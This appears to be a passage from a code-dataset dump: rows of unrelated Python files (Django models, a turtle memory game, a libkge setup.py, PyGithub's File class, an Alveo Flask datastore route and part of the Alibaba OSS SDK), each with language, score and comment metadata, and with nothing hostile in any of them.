8592=3898+4693 (716,816) # MASSIVE $4k DROPOFF FOR $1 INCOME! # 400%: 12k=4251+7749 (354/645) # 400%: ditto # MASSIVE DROPOFF FOR 4: (0/1000) Test main function with interactively entered parameters. ##################################################################################### # main: self test ##################################################################################### # comment-out to disable (see also 'trace' setting)
2.037086
2
welcome/models.py
fathtus/abc
0
6629017
from django.db import models from django.forms import ModelForm # Create your models here. class PageView(models.Model): hostname = models.CharField(max_length=32) timestamp = models.DateTimeField(auto_now_add=True) TITLE_CHOICES = ( ('MR', 'Mr.'), ('MRS', 'Mrs.'), ('MS', 'Ms.'), ) class Author(models.Model): name = models.CharField(max_length=100) title = models.CharField(max_length=3, choices=TITLE_CHOICES) birth_date = models.DateField(blank=True, null=True) def __str__(self): return self.name class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author) class AuthorForm(ModelForm): class Meta: model = Author fields = ['name', 'title'] class BookForm(ModelForm): class Meta: model = Book fields = ['name', 'authors']
from django.db import models from django.forms import ModelForm # Create your models here. class PageView(models.Model): hostname = models.CharField(max_length=32) timestamp = models.DateTimeField(auto_now_add=True) TITLE_CHOICES = ( ('MR', 'Mr.'), ('MRS', 'Mrs.'), ('MS', 'Ms.'), ) class Author(models.Model): name = models.CharField(max_length=100) title = models.CharField(max_length=3, choices=TITLE_CHOICES) birth_date = models.DateField(blank=True, null=True) def __str__(self): return self.name class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author) class AuthorForm(ModelForm): class Meta: model = Author fields = ['name', 'title'] class BookForm(ModelForm): class Meta: model = Book fields = ['name', 'authors']
en
0.963489
# Create your models here.
2.683809
3
Python/memory.py
A01352283/TC1001S.100-202211
0
6629018
"""Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles. """ from random import * from turtle import * from freegames import path mountain = path('car.gif') tiles = list(range(32)) * 2 state = {'mark': None} hide = [True] * 64 def square(x, y): "Draw white square with black outline at (x, y)." up() goto(x, y) down() color('red', 'white') begin_fill() for count in range(4): forward(50) left(90) end_fill() def index(x, y): "Convert (x, y) coordinates to tiles index." return int((x + 200) // 50 + ((y + 200) // 50) * 8) def xy(count): "Convert tiles count to (x, y) coordinates." return (count % 8) * 50 - 200, (count // 8) * 50 - 200 def tap(x, y): "Update mark and hidden tiles based on tap." spot = index(x, y) mark = state['mark'] if mark is None or mark == spot or tiles[mark] != tiles[spot]: state['mark'] = spot else: hide[spot] = False hide[mark] = False state['mark'] = None def draw(): "Draw image and tiles." clear() goto(0, 0) shape(mountain) stamp() for count in range(64): if hide[count]: x, y = xy(count) square(x, y) mark = state['mark'] if mark is not None and hide[mark]: x, y = xy(mark) up() goto(x + 2, y) color('blue') write(tiles[mark], font=('Verdana', 24, 'normal', 'bold', 'italic')) update() ontimer(draw, 100) shuffle(tiles) setup(420, 420, 370, 0) addshape(mountain) hideturtle() tracer(False) onscreenclick(tap) draw() done()
"""Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles. """ from random import * from turtle import * from freegames import path mountain = path('car.gif') tiles = list(range(32)) * 2 state = {'mark': None} hide = [True] * 64 def square(x, y): "Draw white square with black outline at (x, y)." up() goto(x, y) down() color('red', 'white') begin_fill() for count in range(4): forward(50) left(90) end_fill() def index(x, y): "Convert (x, y) coordinates to tiles index." return int((x + 200) // 50 + ((y + 200) // 50) * 8) def xy(count): "Convert tiles count to (x, y) coordinates." return (count % 8) * 50 - 200, (count // 8) * 50 - 200 def tap(x, y): "Update mark and hidden tiles based on tap." spot = index(x, y) mark = state['mark'] if mark is None or mark == spot or tiles[mark] != tiles[spot]: state['mark'] = spot else: hide[spot] = False hide[mark] = False state['mark'] = None def draw(): "Draw image and tiles." clear() goto(0, 0) shape(mountain) stamp() for count in range(64): if hide[count]: x, y = xy(count) square(x, y) mark = state['mark'] if mark is not None and hide[mark]: x, y = xy(mark) up() goto(x + 2, y) color('blue') write(tiles[mark], font=('Verdana', 24, 'normal', 'bold', 'italic')) update() ontimer(draw, 100) shuffle(tiles) setup(420, 420, 370, 0) addshape(mountain) hideturtle() tracer(False) onscreenclick(tap) draw() done()
en
0.809697
Memory, puzzle game of number pairs. Exercises: 1. Count and print how many taps occur. 2. Decrease the number of tiles to a 4x4 grid. 3. Detect when all tiles are revealed. 4. Center single-digit tile. 5. Use letters instead of tiles.
3.786451
4
setup.py
samuelbroscheit/kge
0
6629019
<reponame>samuelbroscheit/kge from setuptools import setup setup( name="libkge", version="0.1", description="A knowledge graph embedding library", url="https://github.com/uma-pi1/kge", author="<NAME>", author_email="<EMAIL>", packages=["kge"], install_requires=[ "torch>=1.3.1", "pyyaml", "pandas", "argparse", "path.py", "ax-platform>=0.1.6", "sqlalchemy", "torchviz", "dataclasses", # LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html "numba==0.48.0" ], zip_safe=False, entry_points={ "console_scripts": [ "kge = kge.cli:main", ], }, )
from setuptools import setup setup( name="libkge", version="0.1", description="A knowledge graph embedding library", url="https://github.com/uma-pi1/kge", author="<NAME>", author_email="<EMAIL>", packages=["kge"], install_requires=[ "torch>=1.3.1", "pyyaml", "pandas", "argparse", "path.py", "ax-platform>=0.1.6", "sqlalchemy", "torchviz", "dataclasses", # LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html "numba==0.48.0" ], zip_safe=False, entry_points={ "console_scripts": [ "kge = kge.cli:main", ], }, )
en
0.703964
# LibKGE uses numba typed-dicts which is part of the experimental numba API # in version 0.48 # see http://numba.pydata.org/numba-doc/0.48.0/reference/pysupported.html
1.498927
1
venv/lib/python2.7/site-packages/github/File.py
sravani-m/Web-Application-Security-Framework
3
6629020
<filename>venv/lib/python2.7/site-packages/github/File.py # -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. 
# # # ################################################################################ import github.GithubObject class File(github.GithubObject.NonCompletableGithubObject): """ This class represents Files as returned for example by http://developer.github.com/v3/todo """ @property def additions(self): """ :type: integer """ return self._additions.value @property def blob_url(self): """ :type: string """ return self._blob_url.value @property def changes(self): """ :type: integer """ return self._changes.value @property def contents_url(self): """ :type: string """ return self._contents_url.value @property def deletions(self): """ :type: integer """ return self._deletions.value @property def filename(self): """ :type: string """ return self._filename.value @property def patch(self): """ :type: string """ return self._patch.value @property def raw_url(self): """ :type: string """ return self._raw_url.value @property def sha(self): """ :type: string """ return self._sha.value @property def status(self): """ :type: string """ return self._status.value def _initAttributes(self): self._additions = github.GithubObject.NotSet self._blob_url = github.GithubObject.NotSet self._changes = github.GithubObject.NotSet self._contents_url = github.GithubObject.NotSet self._deletions = github.GithubObject.NotSet self._filename = github.GithubObject.NotSet self._patch = github.GithubObject.NotSet self._raw_url = github.GithubObject.NotSet self._sha = github.GithubObject.NotSet self._status = github.GithubObject.NotSet def _useAttributes(self, attributes): if "additions" in attributes: # pragma no branch self._additions = self._makeIntAttribute(attributes["additions"]) if "blob_url" in attributes: # pragma no branch self._blob_url = self._makeStringAttribute(attributes["blob_url"]) if "changes" in attributes: # pragma no branch self._changes = self._makeIntAttribute(attributes["changes"]) if "contents_url" in attributes: # pragma no branch self._contents_url = 
self._makeStringAttribute(attributes["contents_url"]) if "deletions" in attributes: # pragma no branch self._deletions = self._makeIntAttribute(attributes["deletions"]) if "filename" in attributes: # pragma no branch self._filename = self._makeStringAttribute(attributes["filename"]) if "patch" in attributes: # pragma no branch self._patch = self._makeStringAttribute(attributes["patch"]) if "raw_url" in attributes: # pragma no branch self._raw_url = self._makeStringAttribute(attributes["raw_url"]) if "sha" in attributes: # pragma no branch self._sha = self._makeStringAttribute(attributes["sha"]) if "status" in attributes: # pragma no branch self._status = self._makeStringAttribute(attributes["status"])
<filename>venv/lib/python2.7/site-packages/github/File.py # -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. 
# # # ################################################################################ import github.GithubObject class File(github.GithubObject.NonCompletableGithubObject): """ This class represents Files as returned for example by http://developer.github.com/v3/todo """ @property def additions(self): """ :type: integer """ return self._additions.value @property def blob_url(self): """ :type: string """ return self._blob_url.value @property def changes(self): """ :type: integer """ return self._changes.value @property def contents_url(self): """ :type: string """ return self._contents_url.value @property def deletions(self): """ :type: integer """ return self._deletions.value @property def filename(self): """ :type: string """ return self._filename.value @property def patch(self): """ :type: string """ return self._patch.value @property def raw_url(self): """ :type: string """ return self._raw_url.value @property def sha(self): """ :type: string """ return self._sha.value @property def status(self): """ :type: string """ return self._status.value def _initAttributes(self): self._additions = github.GithubObject.NotSet self._blob_url = github.GithubObject.NotSet self._changes = github.GithubObject.NotSet self._contents_url = github.GithubObject.NotSet self._deletions = github.GithubObject.NotSet self._filename = github.GithubObject.NotSet self._patch = github.GithubObject.NotSet self._raw_url = github.GithubObject.NotSet self._sha = github.GithubObject.NotSet self._status = github.GithubObject.NotSet def _useAttributes(self, attributes): if "additions" in attributes: # pragma no branch self._additions = self._makeIntAttribute(attributes["additions"]) if "blob_url" in attributes: # pragma no branch self._blob_url = self._makeStringAttribute(attributes["blob_url"]) if "changes" in attributes: # pragma no branch self._changes = self._makeIntAttribute(attributes["changes"]) if "contents_url" in attributes: # pragma no branch self._contents_url = 
self._makeStringAttribute(attributes["contents_url"]) if "deletions" in attributes: # pragma no branch self._deletions = self._makeIntAttribute(attributes["deletions"]) if "filename" in attributes: # pragma no branch self._filename = self._makeStringAttribute(attributes["filename"]) if "patch" in attributes: # pragma no branch self._patch = self._makeStringAttribute(attributes["patch"]) if "raw_url" in attributes: # pragma no branch self._raw_url = self._makeStringAttribute(attributes["raw_url"]) if "sha" in attributes: # pragma no branch self._sha = self._makeStringAttribute(attributes["sha"]) if "status" in attributes: # pragma no branch self._status = self._makeStringAttribute(attributes["status"])
en
0.644241
# -*- coding: utf-8 -*- ############################ Copyrights and license ############################ # # # Copyright 2012 <NAME> <<EMAIL>> # # Copyright 2012 Zearin <<EMAIL>> # # Copyright 2013 AKFish <<EMAIL>> # # Copyright 2013 <NAME> <<EMAIL>> # # # # This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ # # # # PyGithub is free software: you can redistribute it and/or modify it under # # the terms of the GNU Lesser General Public License as published by the Free # # Software Foundation, either version 3 of the License, or (at your option) # # any later version. # # # # PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY # # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # # details. # # # # You should have received a copy of the GNU Lesser General Public License # # along with PyGithub. If not, see <http://www.gnu.org/licenses/>. # # # ################################################################################ This class represents Files as returned for example by http://developer.github.com/v3/todo :type: integer :type: string :type: integer :type: string :type: integer :type: string :type: string :type: string :type: string :type: string # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch # pragma no branch
1.750119
2
application/alveo/views/datastore/store.py
Alveo/alveo-transcriber-services
1
6629021
<gh_stars>1-10 import json import uuid import datetime from flask import g, abort from application import db from application.users.model import User from application.datastore.model import Datastore from application.alveo.module import DOMAIN, SUPPORTED_STORAGE_KEYS from application.auth.required import auth_required from application.datastore.view_wrappers.store import StoreWrapper from application import limiter class AlveoStoreRoute(StoreWrapper): decorators = [ auth_required, limiter.limit("1000 per minute"), limiter.limit("20000 per hour"), limiter.limit("100000 per day") ] def _processor_get(self, object_id, user_id=None, version=None): query = Datastore.query.filter(Datastore.id == object_id).first() if query is None: abort(404, 'No match for the provided id') user = User.query.filter(User.id == query.user_id).first() if not user.domain == DOMAIN: abort( 403, 'You don\'t have permission to read the storage of an external user') base_query = query if version != None: try: query = query.versions[version] except: abort(404, 'Version doesn\'t exist for provided id') else: version = query.versions.count() - 1 data = json.loads(query.value.decode()) original_author = base_query.versions[0].user total_versions = base_query.versions.count() version_author = query.user return { 'id': query.id, 'key': str(query.key.split(':', 1)[1]), 'version': version, 'total_versions': total_versions, 'transcription': data, 'alias': query.alias, 'annotations_total': len(data), 'timestamp': query.timestamp.isoformat(), 'storage_spec': query.storage_spec, 'author': { 'original': { 'ats_id': original_author.id, 'domain': original_author.domain, 'remote_id': original_author.remote_id }, 'version': { 'ats_id': version_author.id, 'domain': version_author.domain, 'remote_id': version_author.remote_id } } } def _processor_post(self, key, value, storage_spec, alias=None): if key is None or len(key) < 2: abort(400, 'Key is invalid or too short') if alias is None or len(alias) < 1: alias = 
"default" validate_data(value) key = '%s:%s' % (DOMAIN, key) model = Datastore.query.filter( Datastore.key == key).filter( Datastore.alias == alias).filter( Datastore.user_id == g.user.id).first() data = json.dumps(value) if model is None: model = Datastore(key, data, storage_spec, g.user, alias) db.session.add(model) else: model.set_value(data) model.storage_spec = storage_spec model.timestamp = datetime.datetime.now() db.session.commit() return { 'id': model.id, 'version': model.versions.count() - 1, 'timestamp': model.timestamp, 'alias': alias } store_route = AlveoStoreRoute.as_view('/alveo/datastore/') def validate_data(data): if not isinstance(data, list): abort(400, 'Expected a list of JSON objects as the data type') supported_keys = SUPPORTED_STORAGE_KEYS.keys() for entry in data: keys = entry.keys() for key in keys: if key not in supported_keys: abort(400, 'Invalid/unsupported key \'%s\'' % key) expected_type = SUPPORTED_STORAGE_KEYS[key]['type'] if not isinstance(entry[key], expected_type): abort(400, 'Invalid type for key \'%s\', expected %s got %s' % (key, expected_type.__name__, type(entry[key]).__name__)) for key in supported_keys: if SUPPORTED_STORAGE_KEYS[key]['required']: if key not in keys: abort(400, 'Required key is missing: %s' % key)
import json import uuid import datetime from flask import g, abort from application import db from application.users.model import User from application.datastore.model import Datastore from application.alveo.module import DOMAIN, SUPPORTED_STORAGE_KEYS from application.auth.required import auth_required from application.datastore.view_wrappers.store import StoreWrapper from application import limiter class AlveoStoreRoute(StoreWrapper): decorators = [ auth_required, limiter.limit("1000 per minute"), limiter.limit("20000 per hour"), limiter.limit("100000 per day") ] def _processor_get(self, object_id, user_id=None, version=None): query = Datastore.query.filter(Datastore.id == object_id).first() if query is None: abort(404, 'No match for the provided id') user = User.query.filter(User.id == query.user_id).first() if not user.domain == DOMAIN: abort( 403, 'You don\'t have permission to read the storage of an external user') base_query = query if version != None: try: query = query.versions[version] except: abort(404, 'Version doesn\'t exist for provided id') else: version = query.versions.count() - 1 data = json.loads(query.value.decode()) original_author = base_query.versions[0].user total_versions = base_query.versions.count() version_author = query.user return { 'id': query.id, 'key': str(query.key.split(':', 1)[1]), 'version': version, 'total_versions': total_versions, 'transcription': data, 'alias': query.alias, 'annotations_total': len(data), 'timestamp': query.timestamp.isoformat(), 'storage_spec': query.storage_spec, 'author': { 'original': { 'ats_id': original_author.id, 'domain': original_author.domain, 'remote_id': original_author.remote_id }, 'version': { 'ats_id': version_author.id, 'domain': version_author.domain, 'remote_id': version_author.remote_id } } } def _processor_post(self, key, value, storage_spec, alias=None): if key is None or len(key) < 2: abort(400, 'Key is invalid or too short') if alias is None or len(alias) < 1: alias = "default" 
validate_data(value) key = '%s:%s' % (DOMAIN, key) model = Datastore.query.filter( Datastore.key == key).filter( Datastore.alias == alias).filter( Datastore.user_id == g.user.id).first() data = json.dumps(value) if model is None: model = Datastore(key, data, storage_spec, g.user, alias) db.session.add(model) else: model.set_value(data) model.storage_spec = storage_spec model.timestamp = datetime.datetime.now() db.session.commit() return { 'id': model.id, 'version': model.versions.count() - 1, 'timestamp': model.timestamp, 'alias': alias } store_route = AlveoStoreRoute.as_view('/alveo/datastore/') def validate_data(data): if not isinstance(data, list): abort(400, 'Expected a list of JSON objects as the data type') supported_keys = SUPPORTED_STORAGE_KEYS.keys() for entry in data: keys = entry.keys() for key in keys: if key not in supported_keys: abort(400, 'Invalid/unsupported key \'%s\'' % key) expected_type = SUPPORTED_STORAGE_KEYS[key]['type'] if not isinstance(entry[key], expected_type): abort(400, 'Invalid type for key \'%s\', expected %s got %s' % (key, expected_type.__name__, type(entry[key]).__name__)) for key in supported_keys: if SUPPORTED_STORAGE_KEYS[key]['required']: if key not in keys: abort(400, 'Required key is missing: %s' % key)
none
1
2.031347
2
ossync/sdk/oss_api.py
lanbaba/Ossyncone
22
6629022
<reponame>lanbaba/Ossyncone #!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. 
import httplib import time import base64 import urllib import StringIO import sys try: from oss.oss_util import * except: from oss_util import * try: from oss.oss_xml_handler import * except: from oss_xml_handler import * class OssAPI: ''' A simple OSS API ''' DefaultContentType = 'application/octet-stream' provider = PROVIDER __version__ = '0.3.2' Version = __version__ AGENT = 'oss-python%s (%s)' % (__version__, sys.platform) def __init__(self, host, access_id, secret_access_key='', port=80, is_security=False): self.SendBufferSize = 8192 self.RecvBufferSize = 1024*1024*10 self.host = get_second_level_domain(host) self.port = port self.access_id = access_id self.secret_access_key = secret_access_key self.show_bar = False self.is_security = is_security self.retry_times = 5 self.agent = self.AGENT self.debug = False def set_debug(self, is_debug): if is_debug: self.debug = True def set_retry_times(self, retry_times=5): self.retry_times = retry_times def set_send_buf_size(self, buf_size): try: self.SendBufferSize = (int)(buf_size) except ValueError: pass def set_recv_buf_size(self, buf_size): try: self.RecvBufferSize = (int)(buf_size) except ValueError: pass def get_connection(self, tmp_host=None): host = '' port = 80 timeout = 10 if not tmp_host: tmp_host = self.host host_port_list = tmp_host.split(":") if len(host_port_list) == 1: host = host_port_list[0].strip() elif len(host_port_list) == 2: host = host_port_list[0].strip() port = int(host_port_list[1].strip()) if self.is_security or port == 443: self.is_security = True if sys.version_info >= (2, 6): return httplib.HTTPSConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPSConnection(host=host, port=port) else: if sys.version_info >= (2, 6): return httplib.HTTPConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPConnection(host=host, port=port) def sign_url_auth_with_expire_time(self, method, url, headers=None, resource="/", timeout=60, params=None): ''' Create the 
authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value sign_url = append_param(url, params) return sign_url def sign_url(self, method, bucket, object, timeout=60, headers=None, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. 
''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/%s%s" % (bucket, object, get_resource(params)) auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value url = '' if self.is_security: if is_ip(self.host): url = "https://%s/%s/%s" % (self.host, bucket, object) else: url = "https://%s.%s/%s" % (bucket, self.host, object) else: if is_ip(self.host): url = "http://%s/%s/%s" % (self.host, bucket, object) else: url = "http://%s.%s/%s" % (bucket, self.host, object) sign_url = append_param(url, params) return sign_url def _create_sign_for_normal_auth(self, method, headers=None, resource="/"): ''' NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. 
:type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string ''' auth_value = "%s %s:%s" % (self.provider, self.access_id, get_assign(self.secret_access_key, method, headers, resource, None, self.debug)) return auth_value def bucket_operation(self, method, bucket, headers=None, params=None): return self.http_request(method, bucket, '', headers, '', params) def object_operation(self, method, bucket, object, headers=None, body='', params=None): return self.http_request(method, bucket, object, headers, body, params) def http_request(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' retry = 5 res = None while retry > 0: retry -= 1 tmp_bucket = bucket tmp_object = object tmp_headers = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() tmp_params = {} if params and isinstance(params, dict): tmp_params = params.copy() res = self.http_request_with_redirect(method, tmp_bucket, tmp_object, tmp_headers, body, tmp_params) if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) else: return res return res def http_request_with_redirect(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' if not params: params = {} if not headers: headers = {} if isinstance(object, unicode): object = object.encode('utf-8') if not bucket: resource = "/" 
headers['Host'] = self.host else: headers['Host'] = "%s.%s" % (bucket, self.host) resource = "/%s/" % bucket resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if is_ip(self.host): url = "/%s/%s" % (bucket, object) if not bucket: url = "/%s" % object headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) headers['Date'] = date headers['Authorization'] = self._create_sign_for_normal_auth(method, headers, resource) headers['User-Agent'] = self.agent if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.request(method, url, body, headers) return conn.getresponse() def get_service(self, headers=None): ''' List all buckets of user ''' return self.list_all_my_buckets(headers) def list_all_my_buckets(self, headers=None): ''' List all buckets of user type headers: dict :param Returns: HTTP Response ''' method = 'GET' bucket = '' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def get_bucket_acl(self, bucket): ''' Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response ''' method = 'GET' object = '' headers = {} body = '' params = {} params['acl'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket_location(self, bucket): ''' Get Location of bucket ''' method = 'GET' object = '' headers = {} body = '' params = {} params['location'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket ''' return self.list_bucket(bucket, prefix, marker, delimiter, maxkeys, headers) def list_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object 
that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['prefix'] = prefix params['marker'] = marker params['delimiter'] = delimiter params['max-keys'] = maxkeys return self.http_request(method, bucket, object, headers, body, params) def create_bucket(self, bucket, acl='', headers=None): ''' Create bucket ''' return self.put_bucket(bucket, acl, headers) def put_bucket(self, bucket, acl='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl method = 'PUT' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_bucket_with_location(self, bucket, acl='', location='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl params = {} body = '' if location != '': body = r'<CreateBucketConfiguration>' body += r'<LocationConstraint>' body += location body += r'</LocationConstraint>' body += r'</CreateBucketConfiguration>' method = 'PUT' object = '' return self.http_request(method, bucket, object, headers, body, params) def delete_bucket(self, bucket, headers=None): ''' Delete bucket :type bucket: string :param Returns: HTTP Response ''' method = 'DELETE' object = '' body = '' params = {} return self.http_request(method, 
bucket, object, headers, body, params) def put_object_with_data(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content ''' return self.put_object_from_string(bucket, object, input_content, content_type, headers, params) def put_object_from_string(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers['Content-Type'] = content_type headers['Content-Length'] = str(len(input_content)) fp = StringIO.StringIO(input_content) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def _open_conn_to_put_object(self, bucket, object, filesize, content_type=DefaultContentType, headers=None, params=None): ''' NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection ''' if not params: params = {} if not headers: headers = {} method = 'PUT' if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/" % bucket if not bucket: resource = "/" resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if bucket: headers['Host'] = "%s.%s" % (bucket, self.host) else: headers['Host'] = self.host if is_ip(self.host): url = "/%s/%s" % (bucket, object) headers['Host'] = self.host url = 
append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.putrequest(method, url) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') headers["Content-Type"] = content_type headers["Content-Length"] = filesize headers["Date"] = date headers["Expect"] = "100-Continue" headers['User-Agent'] = self.agent for k in headers.keys(): conn.putheader(str(k), str(headers[k])) if '' != self.secret_access_key and '' != self.access_id: auth = self._create_sign_for_normal_auth(method, headers, resource) conn.putheader("Authorization", auth) conn.endheaders() return conn def put_object_from_file(self, bucket, object, filename, content_type='', headers=None, params=None): ''' put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' fp = open(filename, 'rb') if not content_type: content_type = get_content_type_by_filename(filename) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def view_bar(self, num=1, sum=100): rate = float(num) / float(sum) rate_num = int(rate * 100) print '\r%d%% ' % (rate_num), sys.stdout.flush() def put_object_from_fp(self, bucket, object, fp, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file 